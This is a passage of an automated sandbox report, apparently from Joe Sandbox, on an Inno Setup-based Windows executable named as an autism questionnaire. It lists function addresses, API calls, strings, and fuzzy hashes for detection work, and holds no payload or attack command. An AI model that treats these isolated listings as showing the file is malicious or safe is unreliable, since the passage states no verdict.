                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                              • String ID: .dat$.msg$IMsg$Uninstall
                                                                                              • API String ID: 3312786188-1660910688
                                                                                              • Opcode ID: f3279caf476708547096f2985ea174fc674a0b957c50a9dc1f64524f0346753e
                                                                                              • Instruction ID: 43941ce92546cf1f75effb4615d96ab71b8b1f254b2d248514a95b56d5af6042
                                                                                              • Opcode Fuzzy Hash: f3279caf476708547096f2985ea174fc674a0b957c50a9dc1f64524f0346753e
                                                                                              • Instruction Fuzzy Hash: 65415CB0A002059FC700EFA4CD96E9EBBB6FB88304F51846AF400A7751DB75AE41DFA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 006153AC, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 59windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000B06,00000000,00000000), ref: 006153C6
                                                                                              • SendMessageW.USER32(00000000,00000B00,00000000,00000000), ref: 00615463
                                                                                              Strings
                                                                                              • Failed to create DebugClientWnd, xrefs: 0061542C
                                                                                              • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 006153F2
                                                                                              • hSa, xrefs: 00615415
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd$hSa
                                                                                              • API String ID: 3850602802-2905362044
                                                                                              • Opcode ID: 4e2498dae47c6d0870a5ab4103f59c6443b436741fa29bda88c5ce5a22a9ee1a
                                                                                              • Instruction ID: bd2b79d17f40968884fe1c372ced24de8c60c917dea0cb25488337d16b2a65e4
                                                                                              • Opcode Fuzzy Hash: 4e2498dae47c6d0870a5ab4103f59c6443b436741fa29bda88c5ce5a22a9ee1a
                                                                                              • Instruction Fuzzy Hash: 391123B1A403129FE300EB28DC81FDABBD69F94304F08002AF5858B3D2D3749C84C766
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00624AA4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MsgWaitForMultipleObjects.USER32 ref: 00624AD6
                                                                                              • GetExitCodeProcess.KERNEL32 ref: 00624AF9
                                                                                              • CloseHandle.KERNEL32(?,00624B2C,00000001,00000000,000000FF,000004FF,00000000,00624B25), ref: 00624B1F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                              • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                              • API String ID: 2573145106-3235461205
                                                                                              • Opcode ID: 5a47b888b64c9d71a21df3ce652ab4a6790a840d61fbcb63caf85f52caaf36c3
                                                                                              • Instruction ID: b445045a4a45572890d55b61ba1fda7f57045845c9b5a3357f52015174d7dfc9
                                                                                              • Opcode Fuzzy Hash: 5a47b888b64c9d71a21df3ce652ab4a6790a840d61fbcb63caf85f52caaf36c3
                                                                                              • Instruction Fuzzy Hash: CE01A234640605AFD710EFA8ED62E9977EAEB49721F200265F520D73D0DE74ED44CA19
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004070B0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 004070E7
                                                                                              • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 004070ED
                                                                                              • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 004070FC
                                                                                              • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 0040710D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory
                                                                                              • String ID: :
                                                                                              • API String ID: 1611563598-336475711
                                                                                              • Opcode ID: aa9707b4d0d9c5d03511b22bbefae7383822b12ede650e628390a7387f8948e9
                                                                                              • Instruction ID: 4e46778bef482c884a40b6a77bd37b1cdf5980326a29a022de95e28d89e8e0a5
                                                                                              • Opcode Fuzzy Hash: aa9707b4d0d9c5d03511b22bbefae7383822b12ede650e628390a7387f8948e9
                                                                                              • Instruction Fuzzy Hash: 71F0627154474465D310E7658852BDB729CDF84348F04843E76C89B2D1E6BC5948979B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0059BDE0, Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ad8bebb6b70c684c30d9747228a5e3f8ffc0963a0edfe972ae4d2d3d4fc87c04
                                                                                              • Instruction ID: f6f51fa323c2004b4ed4a12cf3aa4c02228d8e81e9c13bd86265522dc6499af0
                                                                                              • Opcode Fuzzy Hash: ad8bebb6b70c684c30d9747228a5e3f8ffc0963a0edfe972ae4d2d3d4fc87c04
                                                                                              • Instruction Fuzzy Hash: B01172A160425956FF706A7A6F09BEA3F9C7FD1745F050429BE419B283CB38CC458BA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00423A20, Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A30
                                                                                              • GetLastError.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A3F
                                                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000), ref: 00423A47
                                                                                              • RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A62
                                                                                              • SetLastError.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A70
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLast$AttributesDeleteDirectoryRemove
                                                                                              • String ID:
                                                                                              • API String ID: 2814369299-0
                                                                                              • Opcode ID: c3bc70216ec4533fa759fff64f9e0cfdb1100a6f726ccddcc5e522493d267f4f
                                                                                              • Instruction ID: b6ddb16581f5c3c7179c90d7d3f79c6d55466118c1baf1b24a27a0798ed1e7de
                                                                                              • Opcode Fuzzy Hash: c3bc70216ec4533fa759fff64f9e0cfdb1100a6f726ccddcc5e522493d267f4f
                                                                                              • Instruction Fuzzy Hash: FAF0A7613803241999203DBE28C9ABF115CC9427AFB54077FF994D22D2D62D5F87415D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 005B631C, Relevance: 7.5, APIs: 5, Instructions: 39threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • UnhookWindowsHookEx.USER32(00000000), ref: 005B632E
                                                                                              • SetEvent.KERNEL32(00000000), ref: 005B635A
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 005B635F
                                                                                              • MsgWaitForMultipleObjects.USER32 ref: 005B6388
                                                                                              • CloseHandle.KERNEL32(00000000,00000000), ref: 005B6395
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCurrentEventHandleHookMultipleObjectsThreadUnhookWaitWindows
                                                                                              • String ID:
                                                                                              • API String ID: 2132507429-0
                                                                                              • Opcode ID: 3d70fa8801357980af144d8f96a13d0436440f37400d9bd4b324e4fa6e60107c
                                                                                              • Instruction ID: 777aa0f60006170efd8bf97b8faec0e2cbbea874aebe53a0ac6f8c30ff2fdbbe
                                                                                              • Opcode Fuzzy Hash: 3d70fa8801357980af144d8f96a13d0436440f37400d9bd4b324e4fa6e60107c
                                                                                              • Instruction Fuzzy Hash: 30018B70A09700EED700EB65DC45BAE37E9FB44715F604A2AF055C75D0DB38A480CB42
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 006B8F64, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNEL32(00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000,006B94CE,?,?), ref: 006B8FD4
                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000,006B94CE), ref: 006B8FFD
                                                                                              • MoveFileExW.KERNEL32(00000000,00000000,00000001,00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000), ref: 006B9016
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Attributes$Move
                                                                                              • String ID: isRS-%.3u.tmp
                                                                                              • API String ID: 3839737484-3657609586
                                                                                              • Opcode ID: f1af534764baa85caf1b981574ad6383839b7439e06e2967b69f80573a92c814
                                                                                              • Instruction ID: 31d351f3c97924346b89867796ea0414510024315a00da88274a448b23120628
                                                                                              • Opcode Fuzzy Hash: f1af534764baa85caf1b981574ad6383839b7439e06e2967b69f80573a92c814
                                                                                              • Instruction Fuzzy Hash: AB318170D04218ABCB00EBB9C8859EEB7B9EF48314F51467EF814B7281D7385E818769
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0060C038, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateProcessW.KERNEL32 ref: 0060C08C
                                                                                              • GetLastError.KERNEL32(00000000,00000000,006D579C,?,?,XMb,00000000,>Mb,?,00000000,00000000,0060C0B2,?,?,00000000,00000001), ref: 0060C094
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateErrorLastProcess
                                                                                              • String ID: >Mb$XMb
                                                                                              • API String ID: 2919029540-2660256435
                                                                                              • Opcode ID: fc70ad85d2157d21ba367755dea5396487fa079e60854658823ca55dcf81e298
                                                                                              • Instruction ID: 6fed8a1d79b3fe7fb7c31d778b9d5703ccb9eb2a1393ada51090ba1ca1dee2d9
                                                                                              • Opcode Fuzzy Hash: fc70ad85d2157d21ba367755dea5396487fa079e60854658823ca55dcf81e298
                                                                                              • Instruction Fuzzy Hash: DA113972640208AFCB54DFA9DC81DDFB7ECEB4D320B518666F908D3280D635AE108BA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 006B6998, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateProcessW.KERNEL32 ref: 006B6A05
                                                                                              • CloseHandle.KERNEL32(006B6AB0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,006B6A6C,?,006B6A5C,00000000), ref: 006B6A22
                                                                                                • Part of subcall function 006B68EC: GetLastError.KERNEL32(00000000,006B6989,?,?,?), ref: 006B690F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateErrorHandleLastProcess
                                                                                              • String ID: (\m$D
                                                                                              • API String ID: 3798668922-1981685662
                                                                                              • Opcode ID: a5833d7c80436315819c56a95c2be4cf65ccd9a37b43d1b18280e5cc74a4d4a7
                                                                                              • Instruction ID: 5a29f4a3f67f8962990b16f59edcecd6c92ec2fdb2b6e45770094aa6b13b7383
                                                                                              • Opcode Fuzzy Hash: a5833d7c80436315819c56a95c2be4cf65ccd9a37b43d1b18280e5cc74a4d4a7
                                                                                              • Instruction Fuzzy Hash: 53115EB1604248AFDB00EBA5CC92EEE77ADEF08704F51407AF505F7281E678AE448768
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0062460C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 005C52C8: GetFullPathNameW.KERNEL32(00000000,00001000,?,?,00000002,?,?,006D579C,00000000,0060D8F7,00000000,0060DBD2,?,?,006D579C), ref: 005C52F9
                                                                                              • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 0062464F
                                                                                              • RegisterTypeLib.OLEAUT32(?,00000000,00000000), ref: 0062466B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Type$FullLoadNamePathRegister
